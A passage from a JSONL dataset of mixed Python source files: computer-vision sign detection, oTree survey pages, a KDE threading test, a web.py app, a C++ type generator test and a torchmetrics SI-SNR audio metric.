input_images = ['img-5-b-1', 'img-5-b-2', 'img-5-b-3']\n output_labels = ['ps2-5-b-1', 'ps2-5-b-2', 'ps2-5-b-3']\n\n for img_in, label in zip(input_images, output_labels):\n scene = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords = ps2.traffic_sign_detection_challenge(scene)\n\n img_out = mark_traffic_signs(scene, coords)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n\ndef sign_test():\n input_images = [#'scene_dne_1']\n #'test_images/stop_blank_top_left']\n #'test_images/stop_blank_top_right']\n #'test_images/stop_blank_bot_right']\n #'scene_stp_1']\n #'test_images/stop_249_149_blank']\n #'test_images/stop_249_149_background']\n #'scene_constr_1']\n #'test_images/construction_150_200_blank']\n #'scene_wrng_1']\n #'test_images/warning_250_300_blank']\n #'test_images/yield_173_358_blank']\n #'scene_yld_1']\n #'test_images/yield_173_358_background']\n #'test_images/scene_all_signs']\n #'test_images/yield_bot_left_blank']\n #'scene_some_signs']\n #'scene_all_signs']\n #'scene_some_signs_noisy']\n 'scene_all_signs_noisy']\n\n output_labels = ['test_scene']\n #'ps2-2-a-2'] \n #'ps2-2-a-3']\n #'ps2-2-a-4']\n #'ps2-2-a-5']\n\n sign_fns = [#ps2.do_not_enter_sign_detection]\n #ps2.stop_sign_detection]\n #ps2.construction_sign_detection]\n ps2.warning_sign_detection]\n #ps2.yield_sign_detection]\n\n sign_labels = ['construction'] #['no_entry', 'stop', 'construction', 'warning', 'yield']\n\n for img_in, label, fn, name in zip(input_images, output_labels, sign_fns,\n sign_labels):\n\n sign_img = cv2.imread(\"input_images/{}.png\".format(img_in))\n cv2.imwrite(\"output/{}.png\".format(label), fn(sign_img))\n\n\n\ndef traffic_light_test():\n name = [#'scene_all_signs']\n #'scene_some_signs']\n #'scene_some_signs_noisy']\n 'scene_all_signs_noisy']\n\n radii_range = range(10,30,1)\n img_in = cv2.imread(\"input_images/{}.png\".format(name[0]))\n cv2.imwrite(\"output/{}.png\".format('test_scene_tl'), ps2.noisy_traffic_light_detection(img_in))\n\nif __name__ == '__main__':\n part_1()\n part_2()\n #sign_test()\n part_3()\n #traffic_light_test()\n part_4()\n part_5a()\n part_5b()\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":9260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"562074650","text":"from otree.api import Currency as c, currency_range\nfrom . 
import models\nfrom ._builtin import Page, WaitPage\nfrom .models import Constants\n\n\nclass StartPage(Page):\n\n form_model = 'player'\n form_fields = [\n 'email',\n 'email_validate',\n 'window_height',\n 'window_width',\n 'user_agent',\n 'is_iPad_iOS13',\n ]\n\n def vars_for_template(self):\n return {\n # has to be added in settings.py in SESSION_CONFIG_DEFAULTS\n # 'super': self.session.config['super'],\n # 'supermail': self.session.config['supermail'],\n }\n\n def error_message(self, values):\n if values['email'] != values['email_validate']:\n return \"\"\"Die eingegebenen E-Mail-Adressen stimmen nicht überein.\"\"\"\n\n def before_next_page(self):\n # parti = self.request.build_absolute_uri(self.player.participant._start_url())\n # self.request.session[\"otree\"] = parti\n # self.request.session.set_expiry(1209600) # timeout 2 weeks\n pass\n\n\nclass ScreenOut(Page):\n \"\"\" Page to screen out participants with mobile devices.\n Only displayed if participant is using a mobile; checks\n whether participant is using a mobile device on reloading;\n Shows a next button only if page is reloaded not using a\n mobile device.\n \"\"\"\n\n form_model = 'player'\n form_fields = [\n 'window_height2',\n 'window_width2',\n 'user_agent2',\n 'is_iPad_iOS13_2'\n ]\n\n def is_displayed(self):\n if any(x in self.player.user_agent for x in [\n 'iPhone',\n 'iPad',\n 'Android',\n 'Mobi',\n 'PlayBook',\n 'BlackBerry',\n 'Edge',\n 'MSIE',\n 'Trident'\n ]) or self.player.is_iPad_iOS13 is True:\n return True\n else:\n return False\n\nclass Intro(Page):\n def vars_for_template(self):\n conversion = self.session.config['real_world_currency_per_point']\n participation_fee = self.session.config['participation_fee']\n return dict(conversion=conversion,\n participation_fee=participation_fee)\n\npage_sequence = [\n StartPage,\n ScreenOut,\n Intro\n]\n","sub_path":"StartPage/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"3388702","text":"import os\r\nprint(os.environ)\r\n\r\nimport time\r\nimport numpy as np\r\nfrom scipy.stats import gaussian_kde\r\nfrom threading import Thread\r\nfrom queue import Queue\r\n\r\ndef make_G(X_prob_i, X_prob_j, X_i, X_j, threshold_p = 0.9):\r\n num_points = 10000\r\n data = np.array([X_prob_i, X_prob_j])\r\n det = np.linalg.det(np.corrcoef(data))\r\n eps = 1.0e-9\r\n if abs(det) < eps:\r\n return np.zeros((X_i.shape[0]), dtype=np.bool)\r\n\r\n kde = gaussian_kde(data)\r\n points = kde.resample(num_points)\r\n pr = np.array(kde(points))\r\n pr.sort()\r\n I = np.cumsum(pr)\r\n I = I / I[-1]\r\n ind = np.flatnonzero(I >= threshold_p)[0]\r\n data = np.array([X_i, X_j])\r\n p = np.array(kde(data))\r\n if ind < pr.size:\r\n q = pr[ind]\r\n G = p < q\r\n else:\r\n G = np.ones((X_i.shape[0]), dtype=np.bool)\r\n \r\n return G\r\n\r\nclass CalcWorker(Thread):\r\n def __init__(self, queue):\r\n Thread.__init__(self)\r\n self.queue = queue\r\n \r\n def run(self):\r\n global x, G\r\n num = 65\r\n while True:\r\n i = self.queue.get()\r\n be = time.time()\r\n for j in range(G.shape[2]):\r\n G[:, i, j] = make_G(x[:num, i], x[:num, j], x[:, i], x[:, j])\r\n self.queue.task_done()\r\n en = time.time()\r\n print(i, 'Time: ', en - be)\r\n\r\ndef main():\r\n global x, G\r\n ts = time.time()\r\n n = 1000\r\n num = 65\r\n np.random.seed(42)\r\n x = np.random.rand(100, n)\r\n G = np.zeros((100, n, n), dtype = 'bool')\r\n \r\n #for i in range(n):\r\n '''\r\n be = time.time()\r\n 
i = 0\r\n for j in range(G.shape[2]):\r\n G[:, i, j] = make_G(x[:num, i], x[:num, j], x[:, i], x[:, j])\r\n en = time.time()\r\n print 'Time: ', en - be\r\n print G.mean()\r\n '''\r\n #return\r\n \r\n # Create a queue to communicate with the worker threads\r\n queue = Queue()\r\n # Create 8 worker threads\r\n for i in range(4):\r\n worker = CalcWorker(queue)\r\n # Setting daemon to True will let the main thread exit even though the workers are blocking\r\n worker.daemon = True\r\n worker.start()\r\n # Put the tasks into the queue as a tuple\r\n for i in range(4):\r\n queue.put(i)\r\n # Causes the main thread to wait for the queue to finish processing all the tasks\r\n queue.join()\r\n\r\n print('Took {}'.format(time.time() - ts))\r\n print(G.mean())\r\n\r\nmain()","sub_path":"src/test_kde.py","file_name":"test_kde.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"298740","text":"from ctypes import c_void_p, c_int\r\nimport re\r\n\r\nfrom parakeet_common import list_to_ctypes_array, LibPar, LOG \r\nfrom parakeet_register import VisitedFunctions, VisitedFunctionGlobals\r\nfrom parakeet_values import python_value_to_parakeet, parakeet_value_to_python\r\n\r\ndef _prep_value_list(vals):\r\n parakeet_values = [python_value_to_parakeet(v) for v in vals]\r\n return list_to_ctypes_array(parakeet_values)\r\n\r\ndef _prep_int_list(ints): \r\n n = len(ints)\r\n array_t = c_int * n\r\n arr = array_t()\r\n for i, x in enumerate(ints):\r\n arr[i] = x \r\n return arr \r\n \r\ndef _prep_args(args, kwds):\r\n arg_values = _prep_value_list(args)\r\n \r\n kwd_names = []\r\n kwd_values = []\r\n for (k,v) in kwds.items():\r\n kwd_names.append(c_str(k))\r\n kwd_values.append(python_value_to_parakeet(v))\r\n kwd_names = list_to_ctypes_array(kwd_names)\r\n kwd_values = list_to_ctypes_array(kwd_values)\r\n return arg_values, kwd_names, kwd_values \r\n\r\nclass WrappedFunction:\r\n def __init__(self, old_function, untyped_id, global_vars):\r\n assert untyped_id is not None\r\n self.old_function = old_function\r\n # pretend we are the same function\r\n self.__name__ = old_function.__name__\r\n self.__module__ = old_function.__module__\r\n VisitedFunctions[self] = untyped_id\r\n VisitedFunctionGlobals[self] = global_vars \r\n self.parakeet_untyped_id = untyped_id\r\n self.global_vars = global_vars\r\n \r\n\r\n def _get_global_value(self, var):\r\n var_parts = var.split('.')\r\n try:\r\n curr_val = self.old_function.func_globals[var_parts[0]]\r\n except KeyError:\r\n if isinstance(__builtins__,dict):\r\n curr_val = __builtins__[var_parts[0]]\r\n else:\r\n curr_val = getattr(__builtins__, var_parts[0])\r\n #print \"[Parakeet] Should %s be evaluated?\" % var_parts[0]\r\n for i in range(1, len(var_parts)):\r\n curr_val = curr_val.__dict__[var_parts[i]]\r\n return curr_val\r\n\r\n def _globals_as_python_values(self):\r\n return [self._get_global_value(g) for g in self.global_vars]\r\n \r\n def _globals_as_parakeet_value_list(self):\r\n return [python_value_to_parakeet(v) for v in self._globals_as_python_values()]\r\n \r\n def _globals_as_parakeet_value_array(self):\r\n return list_to_ctypes_array(self._globals_as_parakeet_value_list())\r\n \r\n def _convert_returned_value(self, ret): \r\n if ret.return_code != 0:\r\n raise RuntimeError(\"[Parakeet] Execution failed: %s\" % ret.error_msg)\r\n else:\r\n n = ret.results_len \r\n if n == 0:\r\n return\r\n elif n == 1:\r\n return parakeet_value_to_python(ret.results[0])\r\n 
else:\r\n      results = [parakeet_value_to_python(ret.results[i]) for i in xrange(n)]\r\n      return tuple(results)\r\n\r\n  def _run_adverb(self, adverb_name, combine, args, kwds):\r\n\r\n    fn_id = self.parakeet_untyped_id\r\n    global_values = self._globals_as_python_values()\r\n    \r\n    \r\n    reserved_keywords = ['axis', 'axes', 'fixed', 'combine_fixed']\r\n    \r\n    if 'axis' in kwds:\r\n      axes = kwds['axis']\r\n    elif 'axes' in kwds: \r\n      axes = kwds['axes']\r\n    else:\r\n      axes = None\r\n    \r\n    if axes is not None:\r\n      try:\r\n        iter(axes)\r\n      except:\r\n        axes = [axes]\r\n    \r\n    fixed = kwds.get('fixed', [])\r\n    \r\n    try:\r\n      iter(fixed)\r\n    except:\r\n      fixed = [fixed]\r\n    #TODO: make keywords work for fixed args\r\n    fixed_values, _, _ = _prep_args(global_values + fixed, {})\r\n    \r\n\r\n    if adverb_name.lower() == \"map\":\r\n      combine_provided = False\r\n      combine_id = 0 # no combine function for map; ignored when combine_provided is False\r\n      combine_fixed_values, _, _ = _prep_args([], {})\r\n    else:\r\n      combine_provided = True \r\n      if combine is None:\r\n        wrapped_combine = self \r\n      else:\r\n        wrapped_combine = PAR(combine)\r\n      combine_id = wrapped_combine.parakeet_untyped_id\r\n      combine_globals = wrapped_combine._globals_as_python_values() \r\n      \r\n      combine_fixed = kwds.get('combine_fixed', [])\r\n      try:\r\n        iter(combine_fixed)\r\n      except:\r\n        combine_fixed = [combine_fixed] \r\n      combine_fixed_values, _, _ = \\\r\n        _prep_args(combine_globals + combine_fixed, {})\r\n    \r\n    init = kwds.get('init', [])\r\n    try:\r\n      iter(init)\r\n    except:\r\n      init = [init]\r\n    \r\n    if axes is not None:\r\n      axes_given = True\r\n      axes_values = _prep_int_list(axes) \r\n      n_axes = len(axes_values)\r\n    else:\r\n      axes_given = False\r\n      axes_values = None\r\n      n_axes = 0\r\n\r\n    init_values = _prep_value_list(init)\r\n\r\n\r\n    filtered_kwds = \\\r\n      dict([(k,v) for (k,v) in kwds.items() if k not in reserved_keywords]) \r\n    array_values, array_keywords, array_keyword_values = \\\r\n      _prep_args(args, filtered_kwds) \r\n    \r\n    result = LibPar.run_adverb(\r\n      adverb_name, \r\n      fn_id,\r\n      fixed_values, c_int(len(fixed_values)), \r\n      combine_id, combine_provided, \r\n      combine_fixed_values, c_int(len(combine_fixed_values)), \r\n      init_values, c_int(len(init_values)), \r\n      axes_given, axes_values, c_int(n_axes), \r\n      array_values, c_int(len(array_values)), \r\n      array_keywords, array_keyword_values, c_int(len(array_keywords))) \r\n    return self._convert_returned_value(result)\r\n  \r\n\r\n  def map(self, *args, **kwds):\r\n    return self._run_adverb(\"map\", None, args, kwds)\r\n  \r\n  def reduce(self, combine = None, *args, **kwds):\r\n    return self._run_adverb(\"reduce\", combine, args, kwds)\r\n  \r\n  def scan(self, combine = None, *args, **kwds):\r\n    return self._run_adverb(\"scan\", combine, args, kwds)\r\n  \r\n  def allpairs(self, combine = None, *args, **kwds): \r\n    return self._run_adverb(\"allpairs\", combine, args, kwds)\r\n  \r\n  def __call__(self, *args, **kwds):\r\n    global_values = self._globals_as_parakeet_value_array()\r\n    arg_values, kwd_names, kwd_values = _prep_args(args, kwds) \r\n\r\n    ret = LibPar.run_function(\r\n      self.parakeet_untyped_id, \r\n      global_values, c_int(len(global_values)), \r\n      arg_values, c_int(len(arg_values)),\r\n      kwd_names, kwd_values, c_int(len(kwd_names)))\r\n    return self._convert_returned_value(ret)\r\n  \r\n  def call_original(self, *args, **kwds):\r\n    return self.old_function(*args, **kwds)\r\n\r\n\r\n\r\nfrom parakeet_register import register_function \r\n\r\ndef PAR(old_function):\r\n  untyped_id, global_vars = register_function(old_function)\r\n  return WrappedFunction(old_function, untyped_id, 
global_vars)\r\n","sub_path":"Python/parakeet_wrapped_function.py","file_name":"parakeet_wrapped_function.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"498389318","text":"import random\nimport time\nfrom collections import Counter\n\nsize = 1000000\nseq = []\ncount = 0\nfor x in range(size):\n seq.append(random.randint(1, 1000))\n count += 1 \n\ndef secondMoment(seq):\n c = Counter(seq)\n return sum(v ** 2 for v in c.values())\n\n\ndef AMSestimate(seq, num_samples):\n inds = list(range(len(seq)))\n random.shuffle(inds)\n inds = sorted(inds[: num_samples])\n\n d = {}\n for i, c in enumerate(seq):\n if i in inds and c not in d:\n d[c] = 0\n if c in d:\n d[c] += 1\n print(\"0 moment: \", len(d))\n print(\"1st moment\", size)\n return int(len(seq) / float(len(d)) * sum((2 * v - 1) for v in d.values()))\n\n\nb = secondMoment(seq)\na = AMSestimate(seq, 100)\nprint(\"2nd moment: \", b)\nprint(\"2nd moment by ams from 100: \", a)\nprint(abs(b - a))\nc = AMSestimate(seq, 500)\nprint(\"2nd moment: \", b)\nprint(\"2nd moment by ams from 500: \", c)\nprint(abs(c - a))\n","sub_path":"3task/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"211705039","text":"import numpy as np\nfrom PIL import ImageGrab\nimport cv2\nimport time\nimport pyautogui\nlast_time = time.time()\n\nbase_screen = ImageGrab.grab(bbox = (0, 0, 1920, 1080))\n#base_screen.save(\"pic/temp.png\")\n\ntemplate = cv2.imread(\"pic/py_icon01.jpg\", 0)\nw, h = template.shape[::-1]\n\n#img_rgb = cv2.imread(\"pic/temp.png\")\nimg_gray = cv2.cvtColor(np.array(base_screen), cv2.COLOR_BGR2GRAY)\n#cv2.imshow(\"Название окна\", img_gray)\n#cv2.waitKey(0)\n\nres = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)\nloc = np.where(res >= 0.8)\nprint (np.array(loc))\nprint(time.time() - last_time)\nfor pt in zip(*loc[::-1]):\n x = int(pt[0])\n print(x)\n y = int(pt[1])\n print(y)\n\nprint(x,y)\npyautogui.moveTo(x, y)","sub_path":"test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"172848673","text":"#!/usr/bin/env python\n# coding: utf-8\n#########################################################################\n#Name:codeMain.py \n#BY yu \n#Discription:OPen \n# \n######################################################################### \nimport os\nimport web\nfrom web.contrib.template import render_jinja\nimport article\nimport section\nimport comment\nimport write\nimport util\n\n#import dbMongoApi\n#import sys \n#default_encoding = 'utf-8' \n#if sys.getdefaultencoding() != default_encoding: \n# reload(sys) \n# sys.setdefaultencoding(default_encoding)\n# Client = pymongo.MongoClient('localhost',27017)\n# conn = Client.afterwards\n#web.config.debug = False\nurls = (\n '/', 'view.indexView',\n '/test','index',\n '/user','view.userView',\n '/writer?','view.writerView',\n '/sign_in','view.sign_inView',\n '/article/(.+)','view.articleView',\n '/article','view.articleListView',\n '/sign_up','view.sign_upView',\n '/settings','view.settingsView',\n '/search', 'view.searchView',\n '/mars/feed', 'feedRequest.feeds',\n '/mars/signup', 'userRequest.signUp',\n '/mars/signin', 'userRequest.signIn',\n '/mars/signout','userRequest.signOut',\n '/mars/article/(.+)/follow', 
'articleRequest.addArticleFollow',\n '/mars/article/(.+)/unfollow', 'articleRequest.delArticleFollow',\n '/mars/article/(.+)/write','writeRequest.addWrite',\n '/mars/article/(.+)/like', 'articleRequest.articleLike',\n # web.py matches routes top to bottom, so the catch-all (.+) article routes\n # must come after the more specific /follow, /unfollow, /write and /like routes\n '/mars/article/(.+)', 'articleRequest.articles',\n '/mars/article', 'articleRequest.articles',\n '/mars/section/(.+)/like', 'sectionRequest.sectionLike',\n \"/mars/section/(.+)/comment\", \"commentRequest.comments\",\n '/mars/section', 'sectionRequest.sections',\n '/mars/user/(.+)/follow', 'userRequest.addUserFollow',\n '/mars/user/(.+)/unfollow', 'userRequest.delUserFollow',\n '/mars/user/(.+)/article', 'userRequest.userArticle',\n '/mars/user/(.+)/feed', 'userRequest.userFeed',\n \"/mars/user/(.+)\", \"userRequest.userData\",\n '/mars/user', 'userRequest.userData',\n '/upload', 'fileUpload.fileUpload',\n '/templates','test'\n)\n# app_root = os.path.dirname(__file__)\n# templates_root = os.path.join(app_root,'temp')\n# render = web.template.render(templates_root)\n# class CookieSet:\n# def GET(self):\n# web.setcookie(\"age\", \"23\", 10)\n# return \"Your cookie is create\"\n\n# class CookieGet:\n# def GET(self):\n# try:\n# return \"Your age is : \" \n# except:\n# return \"Your cookie doesn't exists\"\n\n\n\n################################################################################################\nclass index:\n def __init__(self):\n self.render = render_jinja('temp',encoding = 'utf-8',)\n def GET (self,urlId='693c4130-35fe-11e5-b208-60571866305e'):\n getInput = web.input(page = 0, size = 10, search = None, userId = None, token = None, type = None)\n page = int(getInput.page)\n search = getInput.search\n userId = getInput.userId\n token = getInput.token\n if getInput.type:\n type = int(getInput.type)\n else:\n type = None \n pageSize = int(getInput.size)\n returnData = article.getArticle(articleId = urlId, page = page,pageSize = pageSize, search = search, type = type)\n if util.isLogIn(userId,token) and urlId:\n if follow.isFollow(userId,urlId):\n returnData['isFollow'] = 1\n else:\n returnData['isFollow'] = 0 \n # return util.returnBson(1,returnData)\n # data = {}\n # data['likeCount'] = 1000\n # data['commentCount'] = 1000\n # data['time'] = u'昨天'\n # data['content'] = u'皮卡简对皮卡韬对皮卡娇'\n # data['name'] = u'萌萌哒的'\n return self.render.test2(data = returnData)\n\n\n########################################################################################################\n# session = web.session.Session(app, web.session.DiskStore('sessions'))\n \n# web.wsgi.runwsgi = lambda func, addr=None: web.wsgi.runfcgi(func, addr)\n# def session_hook():\n# web.ctx.session = session\n# app.add_processor(web.loadhook(session_hook))##print web.ctx.session.xxx\napp = web.application(urls, globals())\nif web.config.get('_session') is None:\n session = web.session.Session(app, web.session.DiskStore('sessions'),initializer={'userName':None,'userId':None,'userAvatar':None,'token':None})\n web.config._session = session\nelse:\n session = web.config._session \nif __name__ == \"__main__\":\n \n app.run()\n ","sub_path":"codeMain.py","file_name":"codeMain.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"563997051","text":"# Copyright (c) 2012 The Chromium Authors. 
All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom cpp_type_generator import CppTypeGenerator\nimport json\nimport model\nimport unittest\n\nclass CppTypeGeneratorTest(unittest.TestCase):\n def setUp(self):\n self.model = model.Model()\n self.permissions_json = json.loads(open('test/permissions.json').read())\n self.model.AddNamespace(self.permissions_json[0],\n 'path/to/permissions.json')\n self.permissions = self.model.namespaces.get('permissions')\n self.windows_json = json.loads(open('test/windows.json').read())\n self.model.AddNamespace(self.windows_json[0],\n 'path/to/window.json')\n self.windows = self.model.namespaces.get('windows')\n self.tabs_json = json.loads(open('test/tabs.json').read())\n self.model.AddNamespace(self.tabs_json[0],\n 'path/to/tabs.json')\n self.tabs = self.model.namespaces.get('tabs')\n\n def testGenerateCppIncludes(self):\n manager = CppTypeGenerator('', self.windows, 'windows_api')\n manager.AddNamespace(self.tabs, 'tabs_api')\n self.assertEquals('#include \"path/to/tabs_api.h\"',\n manager.GenerateCppIncludes().Render())\n manager = CppTypeGenerator('', self.permissions, 'permissions_api')\n manager.AddNamespace(self.permissions, 'permissions_api')\n self.assertEquals('', manager.GenerateCppIncludes().Render())\n\n def testGenerateCppIncludesMultipleTypes(self):\n m = model.Model()\n self.tabs_json[0]['types'].append(self.permissions_json[0]['types'][0])\n tabs_namespace = m.AddNamespace(self.tabs_json[0],\n 'path/to/tabs.json')\n self.windows_json[0]['functions'].append(\n self.permissions_json[0]['functions'][1])\n windows = m.AddNamespace(self.windows_json[0],\n 'path/to/windows.json')\n manager = CppTypeGenerator('', windows, 'windows_api')\n manager.AddNamespace(tabs_namespace, 'tabs_api')\n self.assertEquals('#include \"path/to/tabs_api.h\"',\n manager.GenerateCppIncludes().Render())\n\n def testGetTypeSimple(self):\n manager = CppTypeGenerator('', self.tabs, 'tabs_api')\n self.assertEquals('int',\n manager.GetType(\n self.tabs.types['Tab'].properties['id']))\n self.assertEquals('std::string',\n manager.GetType(\n self.tabs.types['Tab'].properties['status']))\n self.assertEquals('bool',\n manager.GetType(\n self.tabs.types['Tab'].properties['selected']))\n\n def testGetTypeArray(self):\n manager = CppTypeGenerator('', self.windows, 'windows_api')\n self.assertEquals('std::vector',\n manager.GetType(\n self.windows.functions['getAll'].callback.param))\n manager = CppTypeGenerator('', self.permissions, 'permissions_api')\n self.assertEquals('std::vector',\n manager.GetType(\n self.permissions.types['Permissions'].properties['origins']))\n\n def testGetTypeLocalRef(self):\n manager = CppTypeGenerator('', self.tabs, 'tabs_api')\n self.assertEquals('Tab',\n manager.GetType(\n self.tabs.functions['get'].callback.param))\n\n def testGetTypeIncludedRef(self):\n manager = CppTypeGenerator('', self.windows, 'windows_api')\n manager.AddNamespace(self.tabs, 'tabs_api')\n self.assertEquals('std::vector',\n manager.GetType(\n self.windows.types['Window'].properties['tabs']))\n\n def testGetTypeNotfound(self):\n prop = self.windows.types['Window'].properties['tabs'].item_type\n prop.ref_type = 'Something'\n manager = CppTypeGenerator('', self.windows, 'windows_api')\n self.assertRaises(KeyError, manager.GetType, prop)\n\n def testGetTypeNotimplemented(self):\n prop = self.windows.types['Window'].properties['tabs'].item_type\n prop.type_ = 10\n manager = CppTypeGenerator('', 
self.windows, 'windows_api')\n self.assertRaises(NotImplementedError, manager.GetType, prop)\n\n def testGetTypeWithPadForGeneric(self):\n manager = CppTypeGenerator('', self.permissions, 'permissions_api')\n self.assertEquals('std::vector ',\n manager.GetType(\n self.permissions.types['Permissions'].properties['origins'],\n pad_for_generics=True))\n self.assertEquals('bool',\n manager.GetType(\n self.permissions.functions['contains'].callback.param,\n pad_for_generics=True))\n\n def testNamespaceDeclaration(self):\n manager = CppTypeGenerator('extensions', self.permissions,\n 'permissions_api')\n self.assertEquals(\n 'namespace extensions {\\n'\n 'namespace permissions_api {',\n manager.GetCppNamespaceStart().Render())\n\n manager = CppTypeGenerator('extensions::gen::api', self.permissions,\n 'permissions_api')\n self.assertEquals(\n 'namespace extensions {\\n'\n 'namespace gen {\\n'\n 'namespace api {\\n'\n 'namespace permissions_api {',\n manager.GetCppNamespaceStart().Render())\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tools/json_schema_compiler/cpp_type_generator_test.py","file_name":"cpp_type_generator_test.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"121341001","text":"from clld.db.models.common import Language, LanguageSource, Source\nfrom clld.web.datatables.base import DataTable, Col, LinkCol, DetailsRowLinkCol\nfrom clld.lib.bibtex import EntryType\n\n\nclass TypeCol(Col):\n def __init__(self, dt, name='btype', *args, **kw):\n kw['sTitle'] = 'BibTeX type'\n kw['choices'] = [(t.value, t.description) for t in EntryType]\n super(TypeCol, self).__init__(dt, name, *args, **kw)\n\n def format(self, item):\n return getattr(item.bibtex_type, 'description', '')\n\n def order(self):\n return Source.bibtex_type\n\n def search(self, qs):\n return Source.bibtex_type == getattr(EntryType, qs)\n\n\nclass Sources(DataTable):\n def __init__(self, req, model, language=None, **kw):\n super(Sources, self).__init__(req, model, **kw)\n if language:\n self.language = language\n elif 'language' in req.params:\n self.language = Language.get(req.params['language'])\n else:\n self.language = None\n\n def base_query(self, query):\n if self.language:\n query = query.join(LanguageSource)\\\n .filter(LanguageSource.language_pk == self.language.pk)\n return query\n\n def col_defs(self):\n return [\n DetailsRowLinkCol(self),\n LinkCol(self, 'name'),\n Col(self, 'description', sTitle='Title'),\n Col(self, 'year'),\n Col(self, 'author'),\n TypeCol(self),\n ]\n\n def get_options(self):\n opts = super(Sources, self).get_options()\n if self.language:\n opts['sAjaxSource'] = self.req.route_url(\n 'sources', _query={'language': self.language.id})\n return opts\n","sub_path":"clld/web/datatables/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"399453641","text":"# Copyright The PyTorch Lightning team.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License 
for the specific language governing permissions and\n# limitations under the License.\nfrom typing import Any, Callable, Optional\n\nfrom torch import Tensor, tensor\n\nfrom torchmetrics.functional.audio.si_snr import si_snr\nfrom torchmetrics.metric import Metric\n\n\nclass SI_SNR(Metric):\n \"\"\" Scale-invariant signal-to-noise ratio (SI-SNR).\n\n Forward accepts\n\n - ``preds``: ``shape [...,time]``\n - ``target``: ``shape [...,time]``\n\n Args:\n compute_on_step:\n Forward only calls ``update()`` and returns None if this is set to False. default: True\n dist_sync_on_step:\n Synchronize metric state across processes at each ``forward()``\n before returning the value at the step.\n process_group:\n Specify the process group on which synchronization is called. default: None (which selects the entire world)\n dist_sync_fn:\n Callback that performs the allgather operation on the metric state. When `None`, DDP\n will be used to perform the allgather.\n\n Raises:\n TypeError:\n if target and preds have a different shape\n\n Returns:\n average si-snr value\n\n Example:\n >>> import torch\n >>> from torchmetrics import SI_SNR\n >>> target = torch.tensor([3.0, -0.5, 2.0, 7.0])\n >>> preds = torch.tensor([2.5, 0.0, 2.0, 8.0])\n >>> si_snr = SI_SNR()\n >>> si_snr_val = si_snr(preds, target)\n >>> si_snr_val\n tensor(15.0918)\n\n References:\n [1] Y. Luo and N. Mesgarani, \"TaSNet: Time-Domain Audio Separation Network for Real-Time, Single-Channel Speech\n Separation,\" 2018 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), 2018, pp.\n 696-700, doi: 10.1109/ICASSP.2018.8462116.\n \"\"\"\n sum_si_snr: Tensor\n total: Tensor\n\n def __init__(\n self,\n compute_on_step: bool = True,\n dist_sync_on_step: bool = False,\n process_group: Optional[Any] = None,\n dist_sync_fn: Optional[Callable[[Tensor], Tensor]] = None,\n ) -> None:\n super().__init__(\n compute_on_step=compute_on_step,\n dist_sync_on_step=dist_sync_on_step,\n process_group=process_group,\n dist_sync_fn=dist_sync_fn,\n )\n\n self.add_state(\"sum_si_snr\", default=tensor(0.0), dist_reduce_fx=\"sum\")\n self.add_state(\"total\", default=tensor(0), dist_reduce_fx=\"sum\")\n\n def update(self, preds: Tensor, target: Tensor) -> None: # type: ignore\n \"\"\"\n Update state with predictions and targets.\n\n Args:\n preds: Predictions from model\n target: Ground truth values\n \"\"\"\n si_snr_batch = si_snr(preds=preds, target=target)\n\n self.sum_si_snr += si_snr_batch.sum()\n self.total += si_snr_batch.numel()\n\n def compute(self) -> Tensor:\n \"\"\"\n Computes average SI-SNR.\n \"\"\"\n return self.sum_si_snr / self.total\n\n @property\n def is_differentiable(self) -> bool:\n return True\n","sub_path":"torchmetrics/audio/si_snr.py","file_name":"si_snr.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"455284104","text":"from __future__ import unicode_literals\n\nimport os\n\nimport sphinx_rtd_theme\n\nfolder = os.path.dirname(os.path.abspath(__file__))\nwith open(os.path.join(folder, \"..\", \"VERSION\")) as f:\n version = f.read().strip()\n\ntemplates_path = [\"_templates\"]\nsource_suffix = \".rst\"\nmaster_doc = \"index\"\nproject = \"bgen\"\ncopyright = \"2017, Danilo Horta\"\nauthor = \"Danilo Horta\"\nrelease = version\nlanguage = \"en\"\nexclude_patterns = [\"_build\", \"Thumbs.db\", \".DS_Store\", \"conf.py\"]\npygments_style = \"sphinx\"\ntodo_include_todos = False\nprimary_domain = \"c\"\n\nhtml_theme = 
